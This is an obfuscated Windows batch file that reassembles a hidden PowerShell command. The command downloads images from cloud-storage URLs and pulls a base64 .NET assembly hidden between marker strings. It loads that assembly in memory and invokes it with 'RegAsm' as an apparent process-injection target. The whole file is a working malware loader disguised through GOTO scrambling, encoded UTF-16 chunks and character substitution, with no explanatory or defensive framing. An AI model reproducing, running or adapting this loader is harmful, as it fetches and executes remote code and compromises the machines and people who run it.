@echo off
GOTO GDJIOFGODK
:HOUDFGOUIF
SET GIJNNDJJDG=IAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAd
GOTO OFFDODJIOF
:GIGIJOGJHJ
SET GIDISGDNSG=HMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AG
GOTO GGKOHFGKDN5
:OOIIJGFGFG
SET SIJFDHODOS=CQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHg
GOTO GOJDGUDKDF4
:GGDOGUGGNG
SET JJOGDFIODJ=5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5A
GOTO NFFFKOIFOG
:SNJJGNDODD
SET SIDFUGNGNF='"
GOTO GFIINOGIGS02
:KJJGOSIIOI
SET IIUOKFSJFI=BsAGEAZwApADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO OOIIJGFGFG
:SGFIGNOGGG
SET JGFOGNFJGN=DAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACA
GOTO GFIINOGIGS8
:HOGJKGDNFN
SET OSFSUNHGDF=AGkAYQAmAHQAbwBf#AGUAbgA9ADUAOAA5AGYAOQA1ADYAZQAtAGQAMAAxADkALQ
GOTO HGGNIUFOIK5
:OFFDODJIOF
SET GOFGNJGGSG=AAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACs
GOTO GOJDGUDKDF8
:NFIOKDUNOH
SET NINOGGGGJF=ABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO JNJNGODODJ5
:IDHGINFHOJ
SET FFGUNJJOOO=AAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAB
GOTO GGKOHFGKDN9
:GJJDGGSJHO
SET GOIHISJNKD=AEMAUABVAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO NFFFKOIFOG3
:JINOFDGDDO
SET FOIDGJIDFS=AByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwANAAoAIAAgACAAIAA
GOTO UFOIOGDOGG7
:SGODNDFIDF
SET UJJFGIGJNN=oAHQAaQBnAC4AdwBhAHIALwAvADoAcwAnACwAIAAnADAAJwAsACAAJwAnACwA
GOTO NDSOOIKJOG
:OJGGOJFDGD
SET FNDNGDONDD=lAG0AYQBzAGQALQA2AGMANwAwADIALgBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAG
GOTO HGGNIUFOIK3
:IDDKGNDODF
SET FHFDHFFODO=wA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABmAHMAZABmAHMAZA
GOTO JNJNGODODJ8
:IINGKJGODI
SET SGNHGGGDHH=AG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAG
GOTO GGKOHFGKDN7
:DIGFOGNFDO
SET DINSFDNNDD=BpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAc
GOTO NFFFKOIFOG1
:OOOIJFOJDD
SET DJNOGODDFG=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgA
GOTO HOUDFGOUIF
:GDJIOFGODK
SET FNJIJGJINU=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -C
GOTO GFIINOGIGS
:ONGFGHJGFG
SET ODNDFDDIGG=BBAGkAdgA5AHoAVAByAEwAVgBjAEkARABHAFIAQQB0AFEAUAA3AFMATwAwAEgAWQBD
GOTO HGGNIUFOIK9
:DGNFIIIFUG
SET UFKGJNGOFO=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZ
GOTO GFIINOGIGS3
:SFKFOHDDNS
SET IFGFDFDSJG=hAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAANAAoAIA
GOTO JNJNGODODJ3
:FJDHUDNJIJ
SET ISDNOIDFGO=vAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQB
GOTO SGFIGNOGGG
:GGDOGUGGNG4
SET JDIJSGGJGS=ZwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGwAb
GOTO GGDOGUGGNG5
:JDNFNFFFFG
SET IODSFJDGJG=AAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEcAZQB0AC0AUgBhAG4AZAB
GOTO FJDHUDNJIJ
:FJNNFFIDSG
SET DIGOFGJDKN=ZQB0AE0AZQB0AGgAbwBkACgAJwByAHUAbgBzACcAIAAf#ACAAJwBzACcAKQAuAEkAbgB2AG8A
GOTO GFIJNODGOO
:FNNDDGDGNF
SET SGJJIIIIFO=wAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AG
GOTO SNIJIFDGSN
:FNINIJIDJI
SET GOFSGDNDDF=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQA
GOTO HGGNIUFOIK0
:GGKOHFGKDN
SET USDFGUFDHF=AGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB
GOTO GGDOGUGGNG
:FIGDFNJDSI
SET JSDNGISGDS=AHQAVAB5AHAAZQAoACcAbQB5AHAAcgBvAGcAcgBhAG0ALgBIAG8AbQBlAGUAcw
GOTO NFFFKOIFOG5
:OGDNDODNFO
%FNJIJGJINU%%DKGDDNSFNF%%OJGOGNDIGD%%JGONDKFOFG%%UODJINDDUG%%GNDNFSIFUD%%USDFGUFDHF%%JJOGDFIODJ%%SOJNGFODGK%%OJKNGGFDSD%%ONDSNJNGJI%%DOGDFSJIDD%%UFKGJNGOFO%%HIJINNGGFO%%OKOIDSGJHG%%IODSFJDGJG%%ISDNOIDFGO%%JGFOGNFJGN%%IGJNDDFONO%%OOONGFSNJD%%FNOIHNGKON%%HNGOUJOSGO%%IFGFDFDSJG%%UNKDJFIFKD%%NINOGGGGJF%%DKSDDSJONF%%NIFDUGOHII%%FHFDHFFODO%%NNSNOOGGDG%%GOFSGDNDDF%%JFJFUNNDGI%%SGFFDSFSFJ%%FNDNGDONDD%%NGUFSOKIIF%%OSFSUNHGDF%%DUJKOOFHJO%%SFJGSJJGDI%%GHODJJOGGD%%ODNDFDDIGG%%GIGGFDFNSJ%%IDNFDGGIIK%%DNGOFODFON%%JSGOGDNGDJ%%OJDDFDJFDS%%SGJJIIIIFO%%OGJIDSGDFD%%FOIDGJIDFS%%FDIDDSDNIO%%GOIGINOKKJ%%FSUDKDUSGD%%KIJSHGSDGU%%KHNOISJSKN%%IIUOKFSJFI%%SIJFDHODOS%%JGJDIONNUG%%DJNOGODDFG%%GIJNNDJJDG%%GOFGNJGGSG%%GGOKJGKNON%%KGGSNJGOGI%%INDNFIDOID%%DGGOSFNKDF%%GGSOJFFKIG%%FJODDHFSFO%%GIDISGDNSG%%ODJOIGDIKG%%SGNHGGGDHH%%HDNOJDGSJD%%FFGUNJJOOO%%ONJNFNKONG%%HIIONJJOOO%%INIFIGGIDU%%DGDNNKFFOS%%DDJHFOIFID%%JDIJSGGJGS%%NKNJHFFIGF%%JJSISDGSJH%%JDFIFGDGHF%%NFNFJISGDG%%IGDFFUIIOJ%%DINSFDNNDD%%GDNKNFGODI%%GOIHISJNKD%%OIGSKSNODD%%JSDNGISGDS%%HFGGUGKDOF%%SDGOONNDIG%%GDDNIIFNKD%%KDGIJFNFFN%%IOIFJGDNGF%%NSNDIOGGNI%%NDJGOJIDFF%%OHIGGSDION%%DIGOFGJDKN%%DFIODGDSND%%DIODGNGGNS%%OIOIHGNJNG%%UJJFGIGJNN%%GDNSGONHGS%%OGFNGISIGG%%OJHOJOIGDJ%%SIDFUGNGNF%
GOTO GFIINOGIGS04
:IIINFHFGDI
SET SGFFDSFSFJ=QBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcgB
GOTO OJGGOJFDGD
:JNJNGODODJ
SET OJGOGNDIGD=exe -WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQA
GOTO HGGNIUFOIK
:HGGNIUFOIK
SET JGONDKFOFG=KACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQBy
GOTO UFOIOGDOGG
:GGDOGUGGNG3
SET DDJHFOIFID=AAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEA
GOTO GGDOGUGGNG4
:KOOGFJDDJG
SET OGFNGISIGG== [system.Text.encoding]::Unicode.GetString([system.convert]::From
GOTO GFIINOGIGS00
:GGKOHFGKDN5
SET ODJOIGDIKG=gAaAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAG4AZABJ
GOTO IINGKJGODI
:HGGNIUFOIK9
SET GIGGFDFNSJ=AFoARQBYADYAVQAxADgAJwApACkAOwAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAg
GOTO UFOIOGDOGG0
:JNJNGODODJ1
SET HNGOUJOSGO=AaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#ACkAIAB9ACAAYwB
GOTO SFKFOHDDNS
:JDSDJFFFSG
SET GOIGINOKKJ=AZwAgAD0AIAAnADwAPABCAEEAJwAgACsAIAAnAFMARQAnACAAKwAgACcANgA0AF8AUwBUAE
GOTO OGJSFJIGGS
:GGKOHFGKDN1
SET DGGOSFNKDF=ByAHQASQBuAGQAZQB4ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO GGKOHFGKDN2
:GGDOGUGGNG0
SET HIIONJJOOO=HIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACAAIAAgACQAZQ
GOTO GGDOGUGGNG1
:GGDOGUGGNG8
SET NFNFJISGDG=AIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAHwAIABTAG
GOTO GGDOGUGGNG9
:GGDOGUGGNG7
SET JDFIFGDGHF=ACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACA
GOTO GGDOGUGGNG8
:NDSOOIKJOG
SET GDNSGONHGS=IAAkAGkAbgBqAGUAYwAsACAAJwAwACcAIAAsACAAJwB4ADYANAAnACkAKQB9AH0A'';$oWjuxd 
GOTO KOOGFJDDJG
:SNIJIFDGSN
SET OGJIDSGDFD=UAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAd
GOTO JINOFDGDDO
:GGDOGUGGNG1
SET INIFIGGIDU=BuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZA
GOTO GGDOGUGGNG2
:GFIINOGIGS
SET DKGDDNSFNF=ommand "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.
GOTO JNJNGODODJ
:OGJSFJIGGS
SET FSUDKDUSGD=EAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBB
GOTO GOJDGUDKDF0
:GGDOGUGGNG6
SET JJSISDGSJH=AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBk
GOTO GGDOGUGGNG7
:HGGNIUFOIK0
SET JFJFUNNDGI=bABmAHMAZABmAHMAZABnACAAKwAgACcAZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAY
GOTO IIINFHFGDI
:FGUJOSNUFG
SET GDDNIIFNKD=BjAHQAIABDAFAAVQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbAB
GOTO NFFFKOIFOG8
:FDNGGGIOID
SET SDGOONNDIG=AEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQ
GOTO FGUJOSNUFG
:GOJDGUDKDF
SET GNDNFSIFUD=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBj
GOTO GGKOHFGKDN
:FGOGDDGUIN
SET DNGOFODFON=bwB3AG4AbABvAGEAZABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAJABsAGkAbgB
GOTO IOJFODSOGG
:HGGNIUFOIK6
SET SFJGSJJGDI=sACgAJABsAGYAcwBkAGYAcwBkAGcAIAAf#ACAAJwBhAHUANwAyAG4AdQB4AHoAdgAyAC4AdQBm
GOTO HGGNIUFOIK7
:SFGODNGGUG
SET NDJGOJIDFF=#ACAAJwBBAHMAbQAnADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO IFFDIDOOOD
:GFIINOGIGS8
SET IGJNDDFONO=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAbwByAGUAYQBj
GOTO GFIINOGIGS9
:GFIINOGIGS1
SET DOGDFSJIDD=GEAbQAgACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIAAg
GOTO DGNFIIIFUG
:GFIINOGIGS4
SET OKOIDSGJHG=AZQBuAHQAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO JDNFNFFFFG
:JHHNDJKNJJ
SET NSNDIOGGNI=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABpAG4AagBlAGMAPQAnAFIAZQBnACcAIAAf
GOTO SFGODNGGUG
:IOJFODSOGG
SET JSGOGDNGDJ=f#AHMAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO GJIDKIDGDN
:GFIINOGIGS3
SET HIJINNGGFO=QB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGk
GOTO GFIINOGIGS4
:GOHDIJOOFD
SET IOIFJGDNGF=B0AC0AVABhAGIAbABlACAATgBhAG0AZQAsAEMAUABVAA0ACgAgACAAIAAgACAAIAAgA
GOTO JHHNDJKNJJ
:GJIDKIDGDN
SET OJDDFDJFDS=IAAgACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AG
GOTO FNNDDGDGNF
:NFFFKOIFOG
SET SOJNGFODGK=FAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAA
GOTO JNIHDJGDFO
:GKNODNOOSO
SET OIOIHGNJNG=AMgA3ADQANgAyADMAOAAyADMAMQAvAG0AbwBjAC4AdABuAGUAdABuAG8AYwByAGUAcwB1AGIAdQB
GOTO SGODNDFIDF
:GGKOHFGKDN9
SET ONJNFNKONG=lAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0A
GOTO GGDOGUGGNG0
:JNJNGODODJ0
SET FNOIHNGKON=uAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AGUAYgBDAGw
GOTO JNJNGODODJ1
:JNJNGODODJ3
SET UNKDJFIFKD=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJ
GOTO NFIOKDUNOH
:HGGNIUFOIK7
SET GHODJJOGGD=AHMALgBzAGgALwBmAC8ANABMAGgAVgA1AEIAMQBzAEQAQwB3AEkASwA3AFUAQQ
GOTO ONGFGHJGFG
:IFFDIDOOOD
SET OHIGGSDION=AAgACAAIAAgACAAIAAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcA
GOTO FJNNFFIDSG
:GGDOGUGGNG2
SET DGDNNKFFOS=BlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AI
GOTO GGDOGUGGNG3
:GFIINOGIGS9
SET OOONGFSNJD=AGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAGwAZQBkAEwAaQB
GOTO JNJNGODODJ0
:GGDOGUGGNG9
SET IGDFFUIIOJ=8AcgB0AC0ATwBiAGoAZQBjAHQAIABDAFAAVQAgAC0ARABlAHMAYwBlAG4AZA
GOTO DIGFOGNFDO
:GGKOHFGKDN7
SET HDNOJDGSJD=UAbgBkAEYAbABhAGcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO IDHGINFHOJ
:GGKOHFGKDN2
SET GGSOJFFKIG=AgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0
GOTO GGKOHFGKDN3
:HGGNIUFOIK3
SET NGUFSOKIIF=EAcABwAC8AbwAvAGYAcgBvAHMAdAAlADIARgBwAGkAYwAyAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBk
GOTO HOGJKGDNFN
:HGGNIUFOIK5
SET DUJKOOFHJO=A0ADQANwAyAC0AYQAwADAAMAAtADIAOQBmADgAZQBiADIAMAAzADQAOAA5ACcAKQA
GOTO HGGNIUFOIK6
:GOJDGUDKDF8
SET GGOKJGKNON=APQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAADQAKACA
GOTO GOJDGUDKDF9
:GFIINOGIGS0
SET ONDSNJNGJI=gAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByA
GOTO GFIINOGIGS1
:GGDOGUGGNG5
SET NKNJHFFIGF=wBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4
GOTO GGDOGUGGNG6
:NFFFKOIFOG5
SET HFGGUGKDOF=AnACkAOwANAAoADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO FDNGGGIOID
:NFFFKOIFOG1
SET GDNKNFGODI=gBzAHQAIAA1ACAAfAAgAEYAbwByAG0AYQB0AC0AVABhAGIAbABlACAATgBhAG0AZQAs
GOTO GJJDGGSJHO
:GFIINOGIGS02
                      
GOTO OGDNDODNFO
:GOJDGUDKDF1
SET KHNOISJSKN=QBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARg
GOTO KJJGOSIIOI
:UFOIOGDOGG
SET UODJINDDUG=AHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1AA0ACgAgACAAIA
GOTO GOJDGUDKDF
:GFIJNODGOO
SET DFIODGDSND=awBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AdABzAGU
GOTO FFNGFUIUJN
:GGKOHFGKDN3
SET FJODDHFSFO=AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkA
GOTO GIGIJOGJHJ
:GOJDGUDKDF4
SET JGJDIONNUG=ATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgACAAIAAgACAAIAAg
GOTO OOOIJFOJDD
:FFNGFUIUJN
SET DIODGNGGNS=AdAAvAG4AaQBhAG0ALwBzAGQAYQBlAGgALwBzAGYAZQByAC8ANwAzADMAMQAvADg
GOTO GKNODNOOSO
:JNJNGODODJ6
SET NIFDUGOHII=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkAdABlAHMAMgAgAD0AIAAnAHMAOgAvAC8AJ
GOTO IDDKGNDODF
:GOJDGUDKDF9
SET KGGSNJGOGI=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAYQB
GOTO GGKOHFGKDN0
:JNIHDJGDFO
SET OJKNGGFDSD=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8Ab
GOTO GFIINOGIGS0
:GGKOHFGKDN0
SET INDNFIDOID=zAGUANgA0AEwAZQBuAGcAdABoAGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQ
GOTO GGKOHFGKDN1
:JNJNGODODJ8
SET NNSNOOGGDG=BnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB5AHQAZQBzADIAOwANAAoAIAAgACAAI
GOTO FNINIJIDJI
:GFIINOGIGS00
SET OJHOJOIGDJ=base64string([regex]::Replace($ddsdgo, ''f#'', ''r'')));iex $oWjuxd\"
GOTO SNJJGNDODD
:JNJNGODODJ5
SET DKSDDSJONF=CAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0ACgAgACAAIAAgACAAIA
GOTO JNJNGODODJ6
:NFFFKOIFOG3
SET OIGSKSNODD=CAAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBl
GOTO FIGDFNJDSI
:NFFFKOIFOG8
SET KDGIJFNFFN=lAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAA1ACAAfAAgAEYAbwByAG0AYQ
GOTO GOHDIJOOFD
:GOJDGUDKDF0
SET KIJSHGSDGU=AFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAa
GOTO GOJDGUDKDF1
:UFOIOGDOGG0
SET IDNFDGGIIK=ACAAIAAgACAAIAAgACAAIAAgACAAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEQA
GOTO FGOGDDGUIN
:UFOIOGDOGG7
SET FDIDDSDNIO=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAHQAYQByAHQARgBsAGE
GOTO JDSDJFFFSG
:GFIINOGIGS04
